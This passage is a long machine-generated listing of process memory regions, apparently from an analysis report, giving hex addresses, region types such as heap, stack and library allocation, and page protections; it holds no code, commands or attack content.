478000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
514000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
13B000
|
heap
|
page read and write
|
||
3561000
|
trusted library allocation
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
1ACA4000
|
heap
|
page read and write
|
||
34E000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3154000
|
heap
|
page read and write
|
||
47D000
|
stack
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1AE76000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3131000
|
heap
|
page read and write
|
||
12451000
|
trusted library allocation
|
page read and write
|
||
8C0000
|
heap
|
page execute and read and write
|
||
359E000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page read and write
|
||
3D7000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
439D000
|
heap
|
page read and write
|
||
3091000
|
heap
|
page read and write
|
||
4AB000
|
unkown
|
page readonly
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
495A000
|
heap
|
page read and write
|
||
3B5C000
|
heap
|
page read and write
|
||
2D8000
|
stack
|
page read and write
|
||
71B000
|
heap
|
page read and write
|
||
47B000
|
heap
|
page read and write
|
||
3F51000
|
direct allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
439E000
|
heap
|
page read and write
|
||
1EF0000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
33E000
|
heap
|
page read and write
|
||
70D000
|
heap
|
page read and write
|
||
44EE000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
16C000
|
heap
|
page read and write
|
||
7FE89BFA000
|
trusted library allocation
|
page read and write
|
||
4043000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
42DE000
|
stack
|
page read and write
|
||
577000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
374F000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
2B5000
|
stack
|
page read and write
|
||
56CB000
|
heap
|
page read and write
|
||
290000
|
trusted library allocation
|
page read and write
|
||
4DED000
|
heap
|
page read and write
|
||
2700000
|
remote allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
4915000
|
heap
|
page read and write
|
||
44DB000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
3615000
|
heap
|
page read and write
|
||
4169000
|
heap
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
7FE8B2E0000
|
trusted library allocation
|
page execute and read and write
|
||
43E000
|
heap
|
page read and write
|
||
174000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
1DA0000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
20F0000
|
heap
|
page execute and read and write
|
||
4936000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
12421000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2B6A000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
386C000
|
trusted library allocation
|
page read and write
|
||
312B000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
56BF000
|
heap
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
56A7000
|
heap
|
page read and write
|
||
2402000
|
trusted library allocation
|
page read and write
|
||
582D000
|
heap
|
page read and write
|
||
1DE3000
|
direct allocation
|
page read and write
|
||
3B65000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
2B68000
|
trusted library allocation
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
381D000
|
heap
|
page read and write
|
||
90000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
2DD0000
|
direct allocation
|
page read and write
|
||
39D000
|
direct allocation
|
page read and write
|
||
27A7000
|
trusted library allocation
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
42ED000
|
heap
|
page read and write
|
||
3B6C000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4543000
|
heap
|
page read and write
|
||
305C000
|
heap
|
page read and write
|
||
439B000
|
heap
|
page read and write
|
||
2B71000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
4169000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
4043000
|
heap
|
page read and write
|
||
312D000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
404B000
|
heap
|
page read and write
|
||
452000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
30CF000
|
heap
|
page read and write
|
||
3072000
|
heap
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
3389000
|
trusted library allocation
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
3457000
|
direct allocation
|
page read and write
|
||
2250000
|
trusted library allocation
|
page read and write
|
||
53E2000
|
heap
|
page read and write
|
||
37BA000
|
stack
|
page read and write
|
||
4330000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
5844000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2B68000
|
trusted library allocation
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
3BDC000
|
stack
|
page read and write
|
||
5890000
|
heap
|
page read and write
|
||
5809000
|
heap
|
page read and write
|
||
448F000
|
heap
|
page read and write
|
||
24ED000
|
trusted library allocation
|
page read and write
|
||
292000
|
trusted library allocation
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
41C0000
|
heap
|
page read and write
|
||
5788000
|
heap
|
page read and write
|
||
4D9000
|
heap
|
page read and write
|
||
1C10000
|
heap
|
page read and write
|
||
3417000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
1DA4000
|
heap
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4096000
|
heap
|
page read and write
|
||
1C1D1000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
2D9000
|
heap
|
page read and write
|
||
3B00000
|
direct allocation
|
page read and write
|
||
476C000
|
heap
|
page read and write
|
||
274000
|
trusted library allocation
|
page read and write
|
||
2EAC000
|
stack
|
page read and write
|
||
27AF000
|
trusted library allocation
|
page read and write
|
||
40A7000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
39DA000
|
direct allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4060000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
306D000
|
heap
|
page read and write
|
||
3091000
|
heap
|
page read and write
|
||
43A7000
|
heap
|
page read and write
|
||
1242F000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
34EF000
|
stack
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
7FE8B320000
|
trusted library allocation
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
416E000
|
heap
|
page read and write
|
||
434000
|
heap
|
page read and write
|
||
1C310000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
313E000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
574D000
|
heap
|
page read and write
|
||
4F60000
|
heap
|
page read and write
|
||
536000
|
heap
|
page read and write
|
||
2F2000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
2B76000
|
trusted library allocation
|
page read and write
|
||
3C00000
|
direct allocation
|
page read and write
|
||
46E000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
4399000
|
heap
|
page read and write
|
||
1A4C0000
|
heap
|
page execute and read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
25B0000
|
heap
|
page read and write
|
||
2649000
|
trusted library allocation
|
page read and write
|
||
142000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
3C60000
|
direct allocation
|
page read and write
|
||
2520000
|
heap
|
page execute and read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
510000
|
trusted library allocation
|
page read and write
|
||
247D000
|
trusted library allocation
|
page read and write
|
||
381B000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
4043000
|
heap
|
page read and write
|
||
7FE89A88000
|
trusted library allocation
|
page read and write
|
||
4229000
|
heap
|
page read and write
|
||
40AD000
|
heap
|
page read and write
|
||
24D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
2768000
|
trusted library allocation
|
page read and write
|
||
4907000
|
heap
|
page read and write
|
||
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
1C27E000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
58F5000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2EAA000
|
direct allocation
|
page read and write
|
||
EB000
|
stack
|
page read and write
|
||
3F10000
|
heap
|
page read and write
|
||
3FB0000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
361C000
|
heap
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
4DC000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
5764000
|
heap
|
page read and write
|
||
229E000
|
heap
|
page execute and read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
482000
|
unkown
|
page readonly
|
||
4549000
|
heap
|
page read and write
|
||
3BF1000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
416E000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
490000
|
unkown
|
page write copy
|
||
3B5E000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
241E000
|
trusted library allocation
|
page read and write
|
||
7FE8B304000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
5E0E000
|
stack
|
page read and write
|
||
3BB7000
|
heap
|
page read and write
|
||
40AD000
|
heap
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
32B5000
|
trusted library allocation
|
page read and write
|
||
FA000
|
heap
|
page read and write
|
||
2757000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
33E7000
|
trusted library allocation
|
page read and write
|
||
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
36B0000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
52D0000
|
heap
|
page read and write
|
||
359A000
|
heap
|
page read and write
|
||
449D000
|
heap
|
page read and write
|
||
3E50000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
239F000
|
stack
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
1C23C000
|
heap
|
page read and write
|
||
4A25000
|
heap
|
page read and write
|
||
40A1000
|
heap
|
page read and write
|
||
131000
|
heap
|
page read and write
|
||
296000
|
trusted library allocation
|
page execute and read and write
|
||
3BF4000
|
direct allocation
|
page read and write
|
||
3804000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
2692000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
279C000
|
stack
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
EFF000
|
stack
|
page read and write
|
||
30B4000
|
heap
|
page read and write
|
||
27C8000
|
trusted library allocation
|
page read and write
|
||
41FF000
|
heap
|
page read and write
|
||
41C0000
|
heap
|
page read and write
|
||
1C3B7000
|
heap
|
page read and write
|
||
29A000
|
trusted library allocation
|
page execute and read and write
|
||
1A7CC000
|
stack
|
page read and write
|
||
43FA000
|
heap
|
page read and write
|
||
20A0000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
1C339000
|
heap
|
page read and write
|
||
2B8000
|
stack
|
page read and write
|
||
3804000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
381C000
|
heap
|
page read and write
|
||
3132000
|
heap
|
page read and write
|
||
4936000
|
heap
|
page read and write
|
||
58EA000
|
heap
|
page read and write
|
||
2B55000
|
trusted library allocation
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
27A3000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4201000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
312D000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
5874000
|
heap
|
page read and write
|
||
315D000
|
trusted library allocation
|
page read and write
|
||
28AA000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
25F7000
|
trusted library allocation
|
page read and write
|
||
4199000
|
heap
|
page read and write
|
||
1AF36000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3BC0000
|
trusted library allocation
|
page read and write
|
||
411A000
|
heap
|
page read and write
|
||
414F000
|
stack
|
page read and write
|
||
4229000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
7FE8B440000
|
trusted library allocation
|
page read and write
|
||
58C6000
|
heap
|
page read and write
|
||
58A2000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
7FE8B400000
|
trusted library allocation
|
page read and write
|
||
330000
|
direct allocation
|
page read and write
|
||
D8E000
|
stack
|
page read and write
|
||
243C000
|
trusted library allocation
|
page read and write
|
||
402000
|
system
|
page execute and read and write
|
||
409000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
3A9000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
38F000
|
direct allocation
|
page read and write
|
||
39DD000
|
direct allocation
|
page read and write
|
||
1EC6000
|
heap
|
page read and write
|
||
3F54000
|
direct allocation
|
page read and write
|
||
27A7000
|
trusted library allocation
|
page read and write
|
||
571D000
|
heap
|
page read and write
|
||
39DA000
|
direct allocation
|
page read and write
|
||
135000
|
stack
|
page read and write
|
||
12391000
|
trusted library allocation
|
page read and write
|
||
1B7000
|
trusted library allocation
|
page execute and read and write
|
||
40E1000
|
heap
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
2B7A000
|
trusted library allocation
|
page read and write
|
||
1C57E000
|
stack
|
page read and write
|
||
518E000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
2D67000
|
trusted library allocation
|
page read and write
|
||
4AB000
|
heap
|
page read and write
|
||
4306000
|
heap
|
page read and write
|
||
5EEE000
|
stack
|
page read and write | page guard
|
||
1C20F000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
3F60000
|
direct allocation
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
3BF1000
|
direct allocation
|
page read and write
|
||
43AA000
|
heap
|
page read and write
|
||
4059000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3804000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
7FE89CA0000
|
trusted library allocation
|
page read and write
|
||
4014000
|
trusted library allocation
|
page read and write
|
||
1D90000
|
direct allocation
|
page read and write
|
||
4944000
|
heap
|
page read and write
|
||
476A000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2D0000
|
trusted library allocation
|
page execute and read and write
|
||
37CC000
|
heap
|
page read and write
|
||
2B41000
|
trusted library allocation
|
page read and write
|
||
5712000
|
heap
|
page read and write
|
||
668000
|
heap
|
page read and write
|
||
259000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
3C60000
|
direct allocation
|
page read and write
|
||
44DA000
|
heap
|
page read and write
|
||
131000
|
heap
|
page read and write
|
||
3F60000
|
direct allocation
|
page read and write
|
||
3463000
|
direct allocation
|
page read and write
|
||
449C000
|
heap
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
3110000
|
trusted library allocation
|
page read and write
|
||
7FE8B470000
|
trusted library allocation
|
page read and write
|
||
7FE8B360000
|
trusted library allocation
|
page read and write
|
||
7FE89BF6000
|
trusted library allocation
|
page read and write
|
||
4401000
|
heap
|
page read and write
|
||
449C000
|
heap
|
page read and write
|
||
493A000
|
heap
|
page read and write
|
||
24A6000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
2574000
|
trusted library allocation
|
page read and write
|
||
2B7C000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
EFE000
|
stack
|
page read and write | page guard
|
||
280000
|
trusted library allocation
|
page read and write
|
||
485000
|
heap
|
page read and write
|
||
7FE8B330000
|
trusted library allocation
|
page read and write
|
||
4A20000
|
heap
|
page read and write
|
||
7FE8B410000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
23A0000
|
heap
|
page execute and read and write
|
||
3BD000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3BF7000
|
direct allocation
|
page read and write
|
||
486E000
|
stack
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2440000
|
trusted library allocation
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
2060000
|
trusted library allocation
|
page read and write
|
||
1AA7E000
|
stack
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
7FE8B3C0000
|
trusted library allocation
|
page read and write
|
||
3900000
|
heap
|
page read and write
|
||
30E8000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
2641000
|
trusted library allocation
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
312D000
|
heap
|
page read and write
|
||
2EAA000
|
direct allocation
|
page read and write
|
||
4950000
|
heap
|
page read and write
|
||
2681000
|
trusted library allocation
|
page read and write
|
||
439000
|
heap
|
page read and write
|
||
40B2000
|
heap
|
page read and write
|
||
7FE8B13B000
|
trusted library allocation
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1B250000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
5423000
|
heap
|
page read and write
|
||
2777000
|
trusted library allocation
|
page read and write
|
||
2550000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
2D70000
|
trusted library allocation
|
page execute
|
||
3AF0000
|
heap
|
page read and write
|
||
2489000
|
trusted library allocation
|
page read and write
|
||
420B000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
362000
|
heap
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
548F000
|
stack
|
page read and write
|
||
7FE8B3D0000
|
trusted library allocation
|
page read and write
|
||
315D000
|
trusted library allocation
|
page read and write
|
||
1C5AE000
|
stack
|
page read and write
|
||
31E000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
E6E000
|
stack
|
page read and write | page guard
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3F51000
|
direct allocation
|
page read and write
|
||
455D000
|
heap
|
page read and write
|
||
4700000
|
heap
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
1C2D0000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
267D000
|
trusted library allocation
|
page read and write
|
||
1C296000
|
heap
|
page read and write
|
||
2F4000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2B43000
|
trusted library allocation
|
page read and write
|
||
4A29000
|
heap
|
page read and write
|
||
314A000
|
heap
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
313E000
|
heap
|
page read and write
|
||
7FE8B350000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
570000
|
direct allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
280000
|
heap
|
page read and write
|
||
45C6000
|
heap
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
404B000
|
heap
|
page read and write
|
||
4A60000
|
heap
|
page read and write
|
||
306E000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
30D1000
|
heap
|
page read and write
|
||
41BC000
|
heap
|
page read and write
|
||
2485000
|
trusted library allocation
|
page read and write
|
||
27A7000
|
trusted library allocation
|
page read and write
|
||
27A9000
|
trusted library allocation
|
page read and write
|
||
538000
|
heap
|
page read and write
|
||
377000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3128000
|
heap
|
page read and write
|
||
53BE000
|
stack
|
page read and write
|
||
44A2000
|
heap
|
page read and write
|
||
360E000
|
heap
|
page read and write
|
||
3B00000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE8B450000
|
trusted library allocation
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
423000
|
heap
|
page read and write
|
||
4544000
|
heap
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
43E1000
|
heap
|
page read and write
|
||
49E000
|
stack
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
4936000
|
heap
|
page read and write
|
||
493D000
|
heap
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
23BE000
|
trusted library allocation
|
page read and write
|
||
587E000
|
stack
|
page read and write
|
||
4740000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
1E10000
|
heap
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
1C20000
|
heap
|
page execute and read and write
|
||
1B3E5000
|
heap
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
414000
|
system
|
page execute and read and write
|
||
3E50000
|
heap
|
page read and write
|
||
4EB000
|
heap
|
page read and write
|
||
420C000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
7FE89890000
|
trusted library allocation
|
page read and write
|
||
3B0000
|
direct allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2568000
|
trusted library allocation
|
page read and write
|
||
252F000
|
stack
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
20A5000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
1ACDD000
|
heap
|
page read and write
|
||
3F6000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1C640000
|
heap
|
page read and write
|
||
380000
|
direct allocation
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
4548000
|
heap
|
page read and write
|
||
2B7A000
|
trusted library allocation
|
page read and write
|
||
1B1D0000
|
heap
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
4890000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
7FE89BC3000
|
trusted library allocation
|
page read and write
|
||
534000
|
heap
|
page read and write
|
||
1B28B000
|
heap
|
page read and write
|
||
3158000
|
trusted library allocation
|
page read and write
|
||
493B000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
574F000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
300000
|
trusted library allocation
|
page read and write
|
||
33F0000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
45C4000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
38B000
|
direct allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
54E000
|
heap
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3900000
|
direct allocation
|
page read and write
|
||
3131000
|
heap
|
page read and write
|
||
1A0000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
7FE8B1E0000
|
trusted library allocation
|
page execute and read and write
|
||
3D50000
|
trusted library allocation
|
page read and write
|
||
409F000
|
trusted library allocation
|
page read and write
|
||
455F000
|
heap
|
page read and write
|
||
1C73F000
|
stack
|
page read and write
|
||
5897000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
30B4000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
3FC0000
|
direct allocation
|
page read and write
|
||
2260000
|
heap
|
page execute and read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3071000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
40AE000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
2750000
|
trusted library allocation
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
3730000
|
heap
|
page read and write
|
||
1A6A2000
|
heap
|
page read and write
|
||
403D000
|
heap
|
page read and write
|
||
313E000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
44DF000
|
heap
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
27AD000
|
